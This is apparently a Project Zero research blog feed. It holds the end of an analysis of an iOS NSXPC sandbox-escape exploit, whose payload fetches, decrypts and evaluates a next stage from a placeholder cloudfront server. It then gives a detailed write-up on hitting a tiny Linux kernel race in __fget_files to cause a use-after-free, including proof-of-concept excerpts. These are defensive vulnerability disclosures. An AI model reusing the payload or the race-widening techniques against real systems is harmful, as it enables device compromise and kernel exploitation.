['/System/Library/AccessibilityBundles/\

    AXSpeechImplementation.bundle/AXSpeechImplementation',

 '/System/Library/AccessibilityBundles/\

    AXSpeechImplementation.bundle/AXSpeechImplementation',

 '/System/Library/PrivateFrameworks/\

    AccessibilityUtilities.framework/AccessibilityUtilities',

 '/System/Library/PrivateFrameworks/\

    AccessibilitySharedSupport.framework/AccessibilitySharedSupport',

'/System/Library/PrivateFrameworks/Sharing.framework/Sharing',

'/System/Library/PrivateFrameworks/\

    PrototypeTools.framework/PrototypeTools']

This explains how the deserialization of a PTSection will succeed. But what's so special about PTSections and PTRows?

Predicated Sections

[PTRow initwithcoder:] contains the following snippet:

  self->condition = [coder decodeObjectOfClass:NSPredicate

                           forKey:@"condition"]

  [self->condition allowEvaluation]

This will deserialize an NSPredicate object, assign it to the PTRow member variable condition and call allowEvaluation. This is meant to indicate that the deserializing code considers this predicate safe, but there's no attempt to perform any validation on the predicate contents here. They then need one more trick to find a path to which will additionally evaluate the PTRow's condition predicate.

Here's a snippet from [PTSection initWithCoder:]:

NSSet* allowed = [NSSet setWithObjects: @[PTRow]]

id* rows = [coder decodeObjectOfClasses:allowed forKey:@"rows"]

[self initWithRows:rows]

This deserializes an array of PTRows and passes them to [PTSection initWithRows] which assigns a copy of the array of PTRows to PTSection->rows then calls [self _reloadEnabledRows] which in turn passes each row to [self _shouldEnableRow:]

_shouldEnableRow:row {

  if (row->condition) {

    return [row->condition evaluateWithObject: self->settings]

  }

}

And thus, by sending a PTSection containing a single PTRow with an attached condition NSPredicate they can cause the evaluation of an arbitrary NSPredicate, effectively equivalent to arbitrary code execution in the context of CommCenter.

Payload 2

The NSPredicate attached to the PTRow uses a similar trick to the first payload to cause the evaluation of six independent NSFunctionExpressions, but this time in the context of the CommCenter process. They're presented here in pseudo Objective-C:

Expression 1

[  [CaliCalendarAnonymizer sharedAnonymizedStrings]

   setObject:

     @[[NSURLComponents

         componentsWithString:

         @"https://cloudfront.net/XXX/XXX/XXX?aaaa"], '0']

   forKey: @"0"

]

The use of [CaliCalendarAnonymizer sharedAnonymizedStrings] is a trick to enable the array of independent NSFunctionExpressions to have "local variables". In this first case they create an NSURLComponents object which is used to build parameterised URLs. This URL builder is then stored in the global dictionary returned by [CaliCalendarAnonymizer sharedAnonymizedStrings] under the key "0".

Expression 2

[[NSBundle

  bundleWithPath:@"/System/Library/PrivateFrameworks/\

     SlideshowKit.framework/Frameworks/OpusFoundation.framework"

 ] load]

This causes the OpusFoundation library to be loaded. The exact reason for this is unclear, though the dependency graph of OpusFoundation does include AuthKit which is used by the next NSFunctionExpression. It's possible that this payload is generic and might also be expected to work when evaluated in processes where AuthKit isn't loaded.

Expression 3

[ [ [CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"0" ]

  setQueryItems:

    [ [ [NSArray arrayWithObject:

                 [NSURLQueryItem

                    queryItemWithName: @"m"

                    value:[AKDevice _hardwareModel] ]

                                 ] arrayByAddingObject:

                 [NSURLQueryItem

                    queryItemWithName: @"v"

                    value:[AKDevice _buildNumber] ]

                                 ] arrayByAddingObject:

                 [NSURLQueryItem

                    queryItemWithName: @"u"

                    value:[NSString randomString]]

]

This grabs a reference to the NSURLComponents object stored under the "0" key in the global sharedAnonymizedStrings dictionary then parameterizes the HTTP query string with three values:

  [AKDevice _hardwareModel] returns a string like "iPhone12,3" which determines the exact device model.

  [AKDevice _buildNumber] returns a string like "18A8395" which in combination with the device model allows determining the exact firmware image running on the device.

  [NSString randomString] returns a decimal string representation of a 32-bit random integer like "394681493".

Expression 4

[ [CaliCalendarAnonymizer sharedAnonymizedString]

  setObject:

    [NSPropertyListSerialization

      propertyListWithData:

        [[[NSData

             dataWithContentsOfURL:

               [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

                 objectForKey:@"0"] URL]

          ] AES128DecryptWithPassword:NSData(XXXX)

         ]  decompressedDataUsingAlgorithm:3 error:]

       options: Class(NSConstantValueExpression)

      format: Class(NSConstantValueExpression)

      errors:Class(NSConstantValueExpression)

  ]

  forKey:@"1"

]

The innermost reference to sharedAnonymizedStrings here grabs the NSURLComponents object and builds the full url from the query string parameters set last earlier. That url is passed to [NSData dataWithContentsOfURL:] to fetch a data blob from a remote server.

That data blob is decrypted with a hardcoded AES128 key, decompressed using zlib then parsed as a plist. That parsed plist is stored in the sharedAnonymizedStrings dictionary under the key "1".

Expression 5

[ [[NSThread mainThread] threadDictionary]

  addEntriesFromDictionary:

    [[CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"1"]

]

This copies all the keys and values from the "next-stage" plist into the main thread's theadDictionary.

Expression 6

[ [NSExpression expressionWithFormat:

    [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

      objectForKey:@"1"]

    objectForKey: @"a"]

  ]

  expressionValueWithObject:nil context:nil

]

Finally, this fetches the value of the "a" key from the next-stage plist, parses it as an NSExpression string and evaluates it.

End of the line

At this point we lose the ability to follow the exploit. The attackers have escaped the IMTranscoderAgent sandbox, requested a next-stage from the command and control server and executed it, all without any memory corruption or dependencies on particular versions of the operating system.

In response to this exploit iOS 15.1 significantly reduced the computational power available to NSExpressions:

NSExpression immediately forbids certain operations that have significant side effects, like creating and destroying objects. Additionally, casting string class names into Class objects with NSConstantValueExpression is deprecated.

In addition the PTSection and PTRow objects have been hardened with the following check added around the parsing of serialized NSPredicates:

if (os_variant_allows_internal_security_policies(

      "com.apple.PrototypeTools") {

  [coder decodeObjectOfClass:NSPredicate forKey:@"condition]

...

Object deserialization across trust boundaries still presents an enormous attack surface however.

Conclusion

Perhaps the most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox. With just two tricks (NSObject pointers in protocols and library loading gadgets) it's likely possible to attack almost every initWithCoder implementation in the dyld_shared_cache. There are presumably many other classes in addition to NSPredicate and NSExpression which provide the building blocks for logic-style exploits.

The expressive power of NSXPC just seems fundamentally ill-suited for use across sandbox boundaries, even though it was designed with exactly that in mind. The attack surface reachable from inside a sandbox should be minimal, enumerable and reviewable. Ideally only code which is required for correct functionality should be reachable; it should be possible to determine exactly what that exposed code is and the amount of exposed code should be small enough that manually reviewing it is tractable.

NSXPC requiring developers to explicitly add remotely-exposed methods to interface protocols is a great example of how to make the attack surface enumerable - you can at least find all the entry points fairly easily. However the support for inheritance means that the attack surface exposed there likely isn't reviewable; it's simply too large for anything beyond a basic example.

Refactoring these critical IPC boundaries to be more prescriptive - only allowing a much narrower set of objects in this case - would be a good step towards making the attack surface reviewable. This would probably require fairly significant refactoring for NSXPC; it's built around natively supporting the Objective-C inheritance model and is used very broadly. But without such changes the exposed attack surface is just too large to audit effectively.

The advent of Memory Tagging Extensions (MTE), likely shipping in multiple consumer devices across the ARM ecosystem this year, is a big step in the defense against memory corruption exploitation. But attackers innovate too, and are likely already two steps ahead with a renewed focus on logic bugs. This sandbox escape exploit is likely a sign of the shift we can expect to see over the next few years if the promises of MTE can be delivered. And this exploit was far more extensible, reliable and generic than almost any memory corruption exploit could ever hope to be.

‚úáGoogle Project Zero

Racing against the clock -- hitting a tiny kernel race window

By: Ryan ‚ÄĒ

TL;DR:

How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:

  • use¬†a cache miss to widen the race window a little bit
  • make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
  • make sure that the wakeup triggered by the timerfd has to churn through 50000 waitqueue items created by epoll

Racing one thread against a timer also avoids accumulating timing variations from two threads in each race attempt - hence the title. On the other hand, it also means you now have to deal with how hardware timers actually work, which introduces its own flavors of weird timing variations.

Introduction

I recently discovered a race condition (https://crbug.com/project-zero/2247) in the Linux kernel. (While trying to explain to someone how the fix for CVE-2021-0920 worked - I was explaining why the Unix GC is now safe, and then got confused because I couldn't actually figure out why it's safe after that fix, eventually realizing that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT, which would make it possible to preempt a thread with another thread, as I described at LSSEU2019.

This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though, I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration) because that's the part I was curious about.

This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs.

The UAF reproducer is in our bugtracker.

The bug

In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS file descriptor passing), the kernel tries to figure out whether it can account for all references to some file by comparing the file's refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.

(The same pattern also appears for files as an optimization in __fdget_pos(), see this LKML thread.)

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can't detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero. For example, when this happens in the dup() syscall, the resulting reference will then be installed in the FD table and be available for subsequent syscalls.

When the garbage collector (GC) believes that it has exclusive access to a file, it will perform operations on that file that violate the locking rules used in normal socket-related syscalls such as recvmsg() - unix_stream_read_generic() assumes that queued SKBs can only be removed under the ->iolock mutex, but the GC removes queued SKBs without using that mutex. (Thanks to Xingyu Jin for explaining that to me.)

One way of looking at this bug is that the GC is working correctly - here's a state diagram showing some of the possible states of a struct file, with more specific states nested under less specific ones and with the state transition in the GC marked:

All relevant states are RCU-accessible. An RCU-accessible object can have either a zero refcount or a positive refcount. Objects with a positive refcount can be either live or owned by the garbage collector. When the GC attempts to grab a file, it transitions from the state "live" to the state "owned by GC" by getting exclusive ownership of all references to the file.

While __fget_files() is making an incorrect assumption about the state of the struct file while it is trying to narrow down its possible states - it checks whether get_file_rcu() / get_file_rcu_many() succeeds, which narrows the file's state down a bit but not far enough:

__fget_files() first uses get_file_rcu() to conditionally narrow the state of a file from "any RCU-accessible state" to "any refcounted state". Then it has to narrow the state from "any refcounted state" to "live", but instead it just assumes that they are equivalent.

And this directly leads to how the bug was fixed (there's another follow-up patch, but that one just tries to clarify the code and recoup some of the resulting performance loss) - the fix adds another check in __fget_files() to properly narrow down the state of the file such that the file is guaranteed to be live:

The fix is to properly narrow the state from "any refcounted state" to "live" by checking whether the file is still referenced by a file descriptor table entry.

The fix ensures that a live reference can only be derived from another live reference by comparing with an FD table entry, which is guaranteed to point to a live object.

[Sidenote: This scheme is similar to the one used for struct page - gup_pte_range() also uses the "grab pointer, increment refcount, recheck pointer" pattern for locklessly looking up a struct page from a page table entry while ensuring that new refcounted references can't be created without holding an existing reference. This is really important for struct page because a page can be given back to the page allocator and reused while gup_pte_range() holds an uncounted reference to it - freed pages still have their struct page, so there's no need to delay freeing of the page - so if this went wrong, you'd get a page UAF.]

My initial suggestion was to instead fix the issue by changing how unix_gc() ensures that it has exclusive access, letting it set the file's refcount to zero to prevent turning RCU references into refcounted ones; this would have avoided adding any code in the hot __fget_files() path, but it would have only fixed unix_gc(), not the __fdget_pos() case I discovered later, so it's probably a good thing this isn't how it was fixed:

[Sidenote: In my original bug report I wrote that you'd have to wait an RCU grace period in the GC for this, but that wouldn't be necessary as long as the GC ensures that a reaped socket's refcount never becomes non-zero again.]

The race

There are multiple race conditions involved in exploiting this bug, but by far the trickiest to hit is that we have to race an operation into the tiny race window in the middle of __fget_files() (which can e.g. be reached via dup()), between the file descriptor table lookup and the refcount increment:

static struct file *__fget_files(struct files_struct *files, unsigned int fd,

                                 fmode_t mask, unsigned int refs)

{

        struct file *file;

        rcu_read_lock();

loop:

        file = files_lookup_fd_rcu(files, fd); // race window start

        if (file) {

                /* File object ref couldn't be taken.

                 * dup2() atomicity guarantee is the reason

                 * we loop to catch the new file (or NULL pointer)

                 */

                if (file->f_mode & mask)

                        file = NULL;

                else if (!get_file_rcu_many(file, refs)) // race window end

                        goto loop;

        }

        rcu_read_unlock();

        return file;

}

In this race window, the file descriptor must be closed (to drop the FD's reference to the file) and a unix_gc() run must get past the point where it checks the file's refcount ("total_refs = file_count(u->sk.sk_socket->file)").

In the Debian 5.10.0-9-amd64 kernel at version 5.10.70-1, that race window looks as follows:

<__fget_files+0x1e> cmp    r10,rax

<__fget_files+0x21> sbb    rax,rax

<__fget_files+0x24> mov    rdx,QWORD PTR [r11+0x8]

<__fget_files+0x28> and    eax,r8d

<__fget_files+0x2b> lea    rax,[rdx+rax*8]

<__fget_files+0x2f> mov    r12,QWORD PTR [rax] ; RACE WINDOW START

; r12 now contains file*

<__fget_files+0x32> test   r12,r12

<__fget_files+0x35> je     ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x37> mov    eax,r9d

<__fget_files+0x3a> and    eax,DWORD PTR [r12+0x44] ; LOAD (for ->f_mode)

<__fget_files+0x3f> jne    ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x41> mov    rax,QWORD PTR [r12+0x38] ; LOAD (for ->f_count)

<__fget_files+0x46> lea    rdx,[r12+0x38]

<__fget_files+0x4b> test   rax,rax

<__fget_files+0x4e> je     ffffffff812e3def <__fget_files+0x6f>

<__fget_files+0x50> lea    rcx,[rsi+rax*1]

<__fget_files+0x54> lock cmpxchg QWORD PTR [rdx],rcx ; RACE WINDOW END (on cmpxchg success)

As you can see, the race window is fairly small - around 12 instructions, assuming that the cmpxchg succeeds.

Missing some cache

Luckily for us, the race window contains the first few memory accesses to the struct file; therefore, by making sure that the struct file is not present in the fastest CPU caches, we can widen the race window by as much time as the memory accesses take. The standard way to do this is to use an eviction pattern / eviction set; but instead we can also make the cache line dirty on another core (see Anders Fogh's blogpost for more detail). (I'm not actually sure about the intricacies of how much latency this adds on different manufacturers' CPU cores, or on different CPU generations - I've only tested different versions of my proof-of-concept on Intel Skylake and Tiger Lake. Differences in cache coherency protocols or snooping might make a big difference.)

For the cache line containing the flags and refcount of a struct file, this can be done by, on another CPU, temporarily bumping its refcount up and then changing it back down, e.g. with close(dup(fd)) (or just by accessing the FD in pretty much any way from a multithreaded process).

However, when we're trying to hit the race in __fget_files() via dup(), we don't want any cache misses to occur before we hit the race window - that would slow us down and probably make us miss the race. To prevent that from happening, we can call dup() with a different FD number for a warm-up run shortly before attempting the race. Because we also want the relevant cache line in the FD table to be hot, we should choose the FD number for the warm-up run such that it uses the same cache line of the file descriptor table.

An interruption

Okay, a cache miss might be something like a few dozen or maybe hundred nanoseconds or so - that's better, but it's not great. What else can we do to make this tiny piece of code much slower to execute?

On Android, kernels normally set CONFIG_PREEMPT, which would've allowed abusing the scheduler to somehow interrupt the execution of this code. The way I've done this in the past was to give the victim thread a low scheduler priority and pin it to a specific CPU core together with another high-priority thread that is blocked on a read() syscall on an empty pipe (or eventfd); when data is written to the pipe from another CPU core, the pipe becomes readable, so the high-priority thread (which is registered on the pipe's waitqueue) becomes schedulable, and an inter-processor interrupt (IPI) is sent to the victim's CPU core to force it to enter the scheduler immediately.

One problem with that approach, aside from its reliance on CONFIG_PREEMPT, is that any timing variability in the kernel code involved in sending the IPI makes it harder to actually preempt the victim thread in the right spot.

(Thanks to the Xen security team - I think the first time I heard the idea of using an interrupt to widen a race window might have been from them.)

Setting an alarm

A better way to do this on an Android phone would be to trigger the scheduler not from an IPI, but from an expiring high-resolution timer on the same core, although I didn't get it to work (probably because my code was broken in unrelated ways).

High-resolution timers (hrtimers) are exposed through many userspace APIs. Even the timeout of select()/pselect() uses an hrtimer, although this is an hrtimer that normally has some slack applied to it to allow batching it with timers that are scheduled to expire a bit later. An example of a non-hrtimer-based API is the timeout used for reading from a UNIX domain socket (and probably also other types of sockets?), which can be set via SO_RCVTIMEO.

The thing that makes hrtimers "high-resolution" is that they don't just wait for the next periodic clock tick to arrive; instead, the expiration time of the next hrtimer on the CPU core is programmed into a hardware timer. So we could set an absolute hrtimer for some time in the future via something like timer_settime() or timerfd_settime(), and then at exactly the programmed time, the hardware will raise an interrupt! We've made the timing behavior of the OS irrelevant for the second side of the race, the only thing that matters is the hardware! Or... well, almost...

[Sidenote] Absolute timers: Not quite absolute

So we pick some absolute time at which we want to be interrupted, and tell the kernel using a syscall that accepts an absolute time, in nanoseconds. And then when that timer is the next one scheduled, the OS converts the absolute time to whatever clock base/scale the hardware timer is based on, and programs it into hardware. And the hardware usually supports programming timers with absolute time - e.g. on modern X86 (with X86_FEATURE_TSC_DEADLINE_TIMER), you can simply write an absolute Time Stamp Counter(TSC) deadline into MSR_IA32_TSC_DEADLINE, and when that deadline is reached, you get an interrupt. The situation on arm64 is similar, using the timer's comparator register (CVAL).

However, on both X86 and arm64, even though the clockevent subsystem is theoretically able to give absolute timestamps to clockevent drivers (via ->set_next_ktime()), the drivers instead only implement ->set_next_event(), which takes a relative time as argument. This means that the absolute timestamp has to be converted into a relative one, only to be converted back to absolute a short moment later. The delay between those two operations is essentially added to the timer's expiration time.

Luckily this didn't really seem to be a problem for me; if it was, I would have tried to repeatedly call timerfd_settime() shortly before the planned expiry time to ensure that the last time the hardware timer is programmed, the relevant code path is hot in the caches. (I did do some experimentation on arm64, where this seemed to maybe help a tiny bit, but I didn't really analyze it properly.)

A really big list of things to do

Okay, so all the stuff I said above would be helpful on an Android phone with CONFIG_PREEMPT, but what if we're trying to target a normal desktop/server kernel that doesn't have that turned on?

Well, we can still trigger hrtimer interrupts the same way - we just can't use them to immediately enter the scheduler and preempt the thread anymore. But instead of using the interrupt for preemption, we could just try to make the interrupt handler run for a really long time.

Linux has the concept of a "timerfd", which is a file descriptor that refers to a timer. You can e.g. call read() on a timerfd, and that operation will block until the timer has expired. Or you can monitor the timerfd using epoll, and it will show up as readable when the timer expires.

When a timerfd becomes ready, all the timerfd's waiters (including epoll watches), which are queued up in a linked list, are woken up via the wake_up() path - just like when e.g. a pipe becomes readable. Therefore, if we can make the list of waiters really long, the interrupt handler will have to spend a lot of time iterating over that list.

And for any waitqueue that is wired up to a file descriptor, it is fairly easy to add a ton of entries thanks to epoll. Epoll ties its watches to specific FD numbers, so if you duplicate an FD with hundreds of dup() calls, you can then use a single epoll instance to install hundreds of waiters on the file. Additionally, a single process can have lots of epoll instances. I used 500 epoll instances and 100 duplicate FDs, resulting in 50 000 waitqueue items.

Measuring race outcomes

A nice aspect of this race condition is that if you only hit the difficult race (close() the FD and run unix_gc() while dup() is preempted between FD table lookup and refcount increment), no memory corruption happens yet, but you can observe that the GC has incorrectly removed a socket buffer (SKB) from the victim socket. Even better, if the race fails, you can also see in which direction it failed, as long as no FDs below the victim FD are unused:

  • If dup()¬†returns -1, it was called too late / the interrupt happened too soon: The file*¬†was already gone from the FD table when __fget_files()¬†tried to load it.
  • If dup()¬†returns a file descriptor:
  • If it returns an FD higher than the victim FD, this implies that the victim FD was only closed after dup()¬†had already elevated the refcount and allocated a new FD. This means dup()¬†was called too soon / the interrupt happened too late.
  • If it returns the old victim FD number:
  • If recvmsg()¬†on the FD returned by dup()¬†returns no data, it means the race succeeded: The GC wrongly removed the queued SKB.
  • If recvmsg()¬†returns data, the interrupt happened between the refcount increment and the allocation of a new FD. dup()¬†was called a little bit too soon / the interrupt happened a little bit too late.

Based on this, I repeatedly tested different timing offsets, using a spinloop with a variable number of iterations to skew the timing, and plotted what outcomes the race attempts had depending on the timing skew.

Results: Debian kernel, on Tiger Lake

I tested this on a Tiger Lake laptop, with the same kernel as shown in the disassembly. Note that "0" on the X axis is offset -300 ns relative to the timer's programmed expiry.

This graph shows histograms of race attempt outcomes (too early, success, or too late), with the timing offset at which the outcome occurred on the X axis. The graph shows that depending on the timing offset, up to around 1/3 of race attempts succeeded.

Results: Other kernel, on Skylake

This graph shows similar histograms for a Skylake processor. The exact distribution is different, but again, depending on the timing offset, around 1/3 of race attempts succeeded.

These measurements are from an older laptop with a Skylake CPU, running a different kernel. Here "0" on the X axis is offset -1 us relative to the timer. (These timings are from a system that's running a different kernel from the one shown above, but I don't think that makes a difference.)

The exact timings of course look different between CPUs, and they probably also change based on CPU frequency scaling? But still, if you know what the right timing is (or measure the machine's timing before attempting to actually exploit the bug), you could hit this narrow race with a success rate of about 30%!

How important is the cache miss?

The previous section showed that with the right timing, the race succeeds with a probability around 30% - but it doesn't show whether the cache miss is actually important for that, or whether the race would still work fine without it. To verify that, I patched my test code to try to make the file's cache line hot (present in the cache) instead of cold (not present in the cache):

@@ -312,8 +312,10 @@

     }

 

+#if 0

     // bounce socket's file refcount over to other cpu

     pin_to(2);

     close(SYSCHK(dup(RESURRECT_FD+1-1)));

     pin_to(1);

+#endif

 

     //printf("setting timer\n");

@@ -352,5 +354,5 @@

     close(loop_root);

     while (ts_is_in_future(spin_stop))

-      close(SYSCHK(dup(FAKE_RESURRECT_FD)));

+      close(SYSCHK(dup(RESURRECT_FD)));

     while (ts_is_in_future(my_launch_ts)) /*spin*/;

With that patch, the race outcomes look like this on the Tiger Lake laptop:

This graph is a histogram of race outcomes depending on timing offset; it looks similar to the previous graphs, except that almost no race attempts succeed anymore.

But wait, those graphs make no sense!

If you've been paying attention, you may have noticed that the timing graphs I've been showing are really weird. If we were deterministically hitting the race in exactly the same way every time, the timing graph should look like this (looking just at the "too-early" and "too-late" cases for simplicity):

A sketch of a histogram of race outcomes where the "too early" outcome suddenly drops from 100% probability to 0% probability, and a bit afterwards, the "too late" outcome jumps from 0% probability to 100%

Sure, maybe there is some microarchitectural state that is different between runs, causing timing variations - cache state, branch predictor state, frequency scaling, or something along those lines -, but a small number of discrete events that haven't been accounted for should be adding steps to the graph. (If you're mathematically inclined, you can model that as the result of a convolution of the ideal timing graph with the timing delay distributions of individual discrete events.) For two unaccounted events, that might look like this:

A sketch of a histogram of race outcomes where the "too early" outcome drops from 100% probability to 0% probability in multiple discrete steps, and overlapping that, the "too late" outcome goes up from 0% probability to 100% in multiple discrete steps

But what the graphs are showing is more of a smooth, linear transition, like this:

A sketch of a histogram of race outcomes where the "too early" outcome's share linearly drops while the "too late" outcome's share linearly rises

And that seems to me like there's still something fundamentally wrong. Sure, if there was a sufficiently large number of discrete events mixed together, the curve would eventually just look like a smooth smear - but it seems unlikely to me that there is such a large number of somewhat-evenly distributed random discrete events. And sure, we do get a small amount of timing inaccuracy from sampling the clock in a spinloop, but that should be bounded to the execution time of that spinloop, and the timing smear is far too big for that.

So it looks like there is a source of randomness that isn't a discrete event, but something that introduces a random amount of timing delay within some window. So I became suspicious of the hardware timer. The kernel is using MSR_IA32_TSC_DEADLINE, and the Intel SDM tells us that that thing is programmed with a TSC value, which makes it look as if the timer has very high granularity. But MSR_IA32_TSC_DEADLINE is a newer mode of the LAPIC timer, and the older LAPIC timer modes were instead programmed in units of the APIC timer frequency. According to the Intel SDM, Volume 3A, section 10.5.4 "APIC Timer", that is "the processor’s bus clock or core crystal clock frequency (when TSC/core crystal clock ratio is enumerated in CPUID leaf 0x15) divided by the value specified in the divide configuration register". This frequency is significantly lower than the TSC frequency. So perhaps MSR_IA32_TSC_DEADLINE is actually just a front-end to the same old APIC timer?

I tried to measure the difference between the programmed TSC value and when execution was actually interrupted (not when the interrupt handler starts running, but when the old execution context is interrupted - you can measure that if the interrupted execution context is just running RDTSC in a loop); that looks as follows:

A graph showing noise. Delays from deadline TSC to last successful TSC read before interrupt look essentially random, in the range from around -130 to around 10.

As you can see, the expiry of the hardware timer indeed adds a bunch of noise. The size of the timing difference is also very close to the crystal clock frequency - the TSC/core crystal clock ratio on this machine is 117. So I tried plotting the absolute TSC values at which execution was interrupted, modulo the TSC / core crystal clock ratio, and got this:

A graph showing a clear grouping around 0, roughly in the range -20 to 10, with some noise scattered over the rest of the graph.

This confirms that MSR_IA32_TSC_DEADLINE is (apparently) an interface that internally converts the specified TSC value into less granular bus clock / core crystal clock time, at least on some Intel CPUs.

But there's still something really weird here: The TSC values at which execution seems to be interrupted were at negative offsets relative to the programmed expiry time, as if the timeouts were rounded down to the less granular clock, or something along those lines. To get a better idea of how timer interrupts work, I measured on yet another system (an old Haswell CPU) with a patched kernel when execution is interrupted and when the interrupt handler starts executing relative to the programmed expiry time (and also plotted the difference between the two):

A graph showing that the skid from programmed interrupt time to execution interruption is around -100 to -30 cycles, the skid to interrupt entry is around 360 to 420 cycles, and the time from execution interruption to interrupt entry has much less timing variance and is at around 440 cycles.

So it looks like the CPU starts handling timer interrupts a little bit before the programmed expiry time, but interrupt handler entry takes so long (~450 TSC clock cycles?) that by the time the CPU starts executing the interrupt handler, the timer expiry time has long passed.

Anyway, the important bit for us is that when the CPU interrupts execution due to timer expiry, it's always at a LAPIC timer edge; and LAPIC timer edges happen when the TSC value is a multiple of the TSC/LAPIC clock ratio. An exploit that doesn't take that into account and wrongly assumes that MSR_IA32_TSC_DEADLINE has TSC granularity will have its timing smeared by one LAPIC clock period, which can be something like 40ns.

The ~30% accuracy we could achieve with the existing PoC with the right timing is already not terrible; but if we control for the timer's weirdness, can we do better?

The problem is that we are effectively launching the race with two timers that behave differently: One timer based on calling clock_gettime() in a loop (which uses the high-resolution TSC to compute a time), the other a hardware timer based on the lower-resolution LAPIC clock. I see two options to fix this:

  1. Try to ensure that the second timer is set at the start of a LAPIC clock period - that way, the second timer should hopefully behave exactly like the first (or have an additional fixed offset, but we can compensate for that).
  2. Shift the first timer's expiry time down according to the distance from the second timer to the previous LAPIC clock period.

(One annoyance with this is that while we can grab information on how wall/monotonic time is calculated from TSC from the vvar mapping used by the vDSO, the clock is subject to minuscule additional corrections at every clock tick, which occur every 4ms on standard distro kernels (with CONFIG_HZ=250) as long as any core is running.)

I tried to see whether the timing graph would look nicer if I accounted for this LAPIC clock rounding and also used a custom kernel to cheat and control for possible skid introduced by the absolute-to-relative-and-back conversion of the expiry time (see further up), but that still didn't help all that much.

(No) surprise: clock speed matters

Something I should've thought about way earlier is that of course, clock speed matters. On newer Intel CPUs with P-states, the CPU is normally in control of its own frequency, and dynamically adjusts it as it sees fit; the OS just provides some hints.

Linux has an interface that claims to tell you the "current frequency" of each CPU core in /sys/devices/system/cpu/cpufreq/policy<n>/scaling_cur_freq, but when I tried using that, I got a different "frequency" every time I read that file, which seemed suspicious.

Looking at the implementation, it turns out that the value shown there is calculated in arch_freq_get_on_cpu() and its callees - the value is calculated on demand when the file is read, with results cached for around 10 milliseconds. The value is determined as the ratio between the deltas of MSR_IA32_APERF and MSR_IA32_MPERF between the last read and the current one. So if you have some tool that is polling these values every few seconds and wants to show average clock frequency over that time, it's probably a good way of doing things; but if you actually want the current clock frequency, it's not a good fit.

I hacked a helper into my kernel that samples both MSRs twice in quick succession, and that gives much cleaner results. When I measure the clock speeds and timing offsets at which the race succeeds, the result looks like this (showing just two clock speeds; the Y axis is the number of race successes at the clock offset specified on the X axis and the frequency scaling specified by the color):

A graph showing that the timing of successful race attempts depends on the CPU's performance setting - at 11/28 performance, most successful race attempts occur around clock offset -1200 (in TSC units), while at 14/28 performance, most successful race attempts occur around clock offset -1000.

So clearly, dynamic frequency scaling has a huge impact on the timing of the race - I guess that's to be expected, really.

But even accounting for all this, the graph still looks kind of smooth, so clearly there is still something more that I'm missing - oh well. I decided to stop experimenting with the race's timing at this point, since I didn't want to sink too much time into it. (Or perhaps I actually just stopped because I got distracted by newer and shinier things?)

Causing a UAF

Anyway, I could probably spend much more time trying to investigate the timing variations (and probably mostly bang my head against a wall because details of execution timing are really difficult to understand in detail, and to understand it completely, it might be necessary to use something like Gamozo Labs' "Sushi Roll" and then go through every single instruction in detail and compare the observations to the internal architecture of the CPU). Let's not do that, and get back to how to actually exploit this bug!

To turn this bug into memory corruption, we have to abuse that the recvmsg() path assumes that SKBs on the receive queue are protected from deletion by the socket mutex while the GC actually deletes SKBs from the receive queue without touching the socket mutex. For that purpose, while the unix GC is running, we have to start a recvmsg() call that looks up the victim SKB, block until the unix GC has freed the SKB, and then let recvmsg() continue operating on the freed SKB. This is fairly straightforward - while it is a race, we can easily slow down unix_gc() for multiple milliseconds by creating lots of sockets that are not directly referenced from the FD table and have many tiny SKBs queued up - here's a graph showing the unix GC execution time on my laptop, depending on the number of queued SKBs that the GC has to scan through:

A graph showing the time spent per GC run depending on the number of queued SKBs. The relationship is roughly linear.

To turn this into a UAF, it's also necessary to get past the following check near the end of unix_gc():

       /* All candidates should have been detached by now. */

        BUG_ON(!list_empty(&gc_candidates));

gc_candidates is a list that previously contained all sockets that were deemed to be unreachable by the GC. Then, the GC attempted to free all those sockets by eliminating their mutual references. If we manage to keep a reference to one of the sockets that the GC thought was going away, the GC detects that with the BUG_ON().

But we don't actually need the victim SKB to reference a socket that the GC thinks is going away; in scan_inflight(), the GC targets any SKB with a socket that is marked UNIX_GC_CANDIDATE, meaning it just had to be a candidate for being scanned by the GC. So by making the victim SKB hold a reference to a socket that is not directly referenced from a file descriptor table, but is indirectly referenced by a file descriptor table through another socket, we can ensure that the BUG_ON() won't trigger.

I extended my reproducer with this trick and some userfaultfd trickery to make recv() run with the right timing. Nowadays you don't necessarily get full access to userfaultfd as a normal user, but since I'm just trying to show the concept, and there are alternatives to userfaultfd (using FUSE or just slow disk access), that's good enough for this blogpost.

When a normal distro kernel is running normally, the UAF reproducer's UAF accesses won't actually be noticeable; but if you add the kernel command line flag slub_debug=FP (to enable SLUB's poisoning and sanity checks), the reproducer quickly crashes twice, first with a poison dereference and then a poison overwrite detection, showing that one byte of the poison was incremented:

general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] SMP NOPTI

CPU: 1 PID: 2655 Comm: hardirq_loop Not tainted 5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

RIP: 0010:unix_stream_read_generic+0x72b/0x870

